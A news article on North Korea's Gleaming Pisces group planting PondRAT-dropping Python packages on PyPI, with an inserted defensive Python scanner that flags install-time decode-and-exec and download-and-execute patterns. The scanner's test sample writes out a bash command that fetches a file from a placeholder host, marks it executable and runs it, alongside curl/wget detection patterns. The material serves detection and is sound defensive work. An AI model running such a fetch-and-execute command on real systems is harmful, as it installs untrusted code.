North Korea Targets Software Supply Chain Through PyPI
3rd Party Risk Management, Cyberwarfare / Nation-State Attacks, Fraud Management & Cybercrime
Backdoored Python Packages Possible Work of ‘Gleaming Pisces,’ Says Palo Alto
A North Korean hacking group with a history of stealing cryptocurrency is likely behind a raft of poisoned Python packages targeting developers working on the Linux and macOS operating systems in an apparent attempt at a supply chain attack.
Researchers at Palo Alto’s Unit 42 attributed a campaign in which malware-laden Python code is uploaded to the PyPI open-source repository to the North Korea-linked APT group tracked as “Gleaming Pisces,” with medium confidence.
Also called Citrine Sleet, the group is known for distributing a version of AppleJeus malware aimed at cryptocurrency traders.
The infection chain consists of several Python packages that decode and execute encoded code. “After Python installed and loaded the malicious package, a malicious piece of code eventually ran several bash commands to download the RAT, modifying its permissions and executing it,” the researchers said.
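The behaviour quoted above (code that decodes an encoded blob, executes it, and shells out to bash to download, chmod and run a payload) is something a package review or CI gate can look for statically. The scanner below is an added example, not code from the article or from Unit 42's report; the two sample sources, the placeholder URL, the function names and the two-finding threshold are constructed for illustration. It inspects source text with the `ast` module and never executes the package.

```python
"""
Added example (not from the article or Unit 42): a heuristic static scanner
for Python package code that shows the install-time pattern described in the
article: decode an encoded blob, exec() it, spawn bash to fetch and run a file.
Heuristic only; it parses and pattern-matches, it executes nothing.
"""
import ast
import os
import re
from typing import Dict, List

# Constructed sample resembling a malicious __init__.py. The blob decodes to
# print('hi') and the URL is a placeholder; nothing here reaches the network.
SUSPICIOUS_SAMPLE = '''
import base64, subprocess
_p = base64.b64decode("cHJpbnQoJ2hpJyk=")
exec(_p)
subprocess.Popen(["bash", "-c", "curl -s http://example.invalid/x -o /tmp/x; chmod +x /tmp/x; /tmp/x"])
'''

# Constructed benign sample for comparison.
BENIGN_SAMPLE = '''
import json
def load(path):
    with open(path) as fh:
        return json.load(fh)
'''

DECODE_FUNCS = {"b64decode", "b32decode", "a85decode", "unhexlify", "decompress"}
EXEC_FUNCS = {"exec", "eval"}
SPAWN_FUNCS = {"Popen", "run", "call", "check_output", "check_call", "system"}
SHELL_NAMES = ("bash", "sh", "/bin/bash", "/bin/sh")
# A shell string that downloads something and then marks it executable.
SHELL_RE = re.compile(r"\b(curl|wget)\b.*\b(chmod\s+\+x|chmod\s+[0-7]{3,4})\b", re.S)


def _call_name(node: ast.Call) -> str:
    """Bare function name of a call: base64.b64decode -> 'b64decode'."""
    f = node.func
    if isinstance(f, ast.Attribute):
        return f.attr
    if isinstance(f, ast.Name):
        return f.id
    return ""


def _string_literals(tree: ast.AST):
    for node in ast.walk(tree):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            yield node.value


def scan_source(src: str) -> List[str]:
    """Return a list of human-readable findings for one Python source file."""
    findings: List[str] = []
    try:
        tree = ast.parse(src)
    except SyntaxError:
        return ["unparseable source (possible obfuscation)"]

    called = set()
    shell_spawn = False
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        name = _call_name(node)
        called.add(name)
        # subprocess.* / os.system handed a bash or sh argument
        if name in SPAWN_FUNCS:
            for sub in ast.walk(node):
                if isinstance(sub, ast.Constant) and sub.value in SHELL_NAMES:
                    shell_spawn = True

    if called & DECODE_FUNCS:
        findings.append("decodes an encoded blob at import/install time")
    if called & EXEC_FUNCS:
        findings.append("exec/eval of runtime-built code")
    if called & DECODE_FUNCS and called & EXEC_FUNCS:
        findings.append("decode-then-exec chain")
    if shell_spawn:
        findings.append("spawns a bash/sh shell")
    if any(SHELL_RE.search(s) for s in _string_literals(tree)):
        findings.append("shell string downloads a file and marks it executable")
    return findings


def is_suspicious(src: str, threshold: int = 2) -> bool:
    """Two or more independent indicators is the (assumed) review threshold."""
    return len(scan_source(src)) >= threshold


def scan_package_dir(root: str) -> Dict[str, List[str]]:
    """Scan every .py file under an unpacked package (setup.py, __init__.py, ...)."""
    report: Dict[str, List[str]] = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if fn.endswith(".py"):
                path = os.path.join(dirpath, fn)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_source(fh.read())
                if hits:
                    report[path] = hits
    return report


if __name__ == "__main__":
    for label, sample in (("suspicious", SUSPICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, "->", scan_source(sample) or "no findings")
```

Run it against an unpacked sdist or wheel with `scan_package_dir("/path/to/unpacked")`; any file with two or more findings deserves a manual read before the package is allowed into a build. Legitimate packages do occasionally decode data or call subprocess, which is why the check counts independent indicators rather than treating any single one as malicious.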
The North Korean hereditary Juche absolutist monarchy actively steals cryptocurrency to fund weapons of mass destruction development and inject hard currency into the heavily sanctioned economy. Pyongyang’s AppleJeus hackers have targeted the software supply chain in the past, succeeding beyond expectations in 2023 when a flaw inserted into an outdated trading software package led them to compromise a desktop phone application made by 3CX and used by multinational firms including Toyota, Coca-Cola and Air France (see: North Korean Hackers Chained Supply Chain Hacks to Reach 3CX).
PyPI, a widely used repository of Python libraries, has been the repeated target of malicious users. Administrators in March halted new user registrations for a second time after threat actors flooded the repository with typosquatted versions of well-known packages to deceive developers (see: Malware Flood Causes PyPI to Temporarily Halt New Accounts).
“We assess that the threat actor’s goal was to secure access to supply chain vendors through developers’ endpoints and subsequently gain access to the vendors’ customers’ endpoints,” the researchers said.
The malicious packages observed by Palo Alto are no longer available on PyPI, but the impact on organizations using infected third-party software remains significant, they added.
The North Korean attribution comes after researchers found overlapping code structure, identical function names and encryption keys, and similar execution flows with a previous AppleJeus backdoor. Palo Alto named the backdoor in this campaign PondRAT. It shares many traits with PoolRat, a known North Korean backdoor that Mandiant spotted in the 2023 supply chain attack against 3CX.
A PondRAT variant observed by Palo Alto for macOS also used rebelthumb.net as its command-and-control domain. Volexity in 2022 identified the hostname as an AppleJeus server.
The now-removed Python packages are: real-ids with 893 downloads, coloredtxt with 381 downloads, beautifultext with 736 downloads, and minisound with 416 downloads.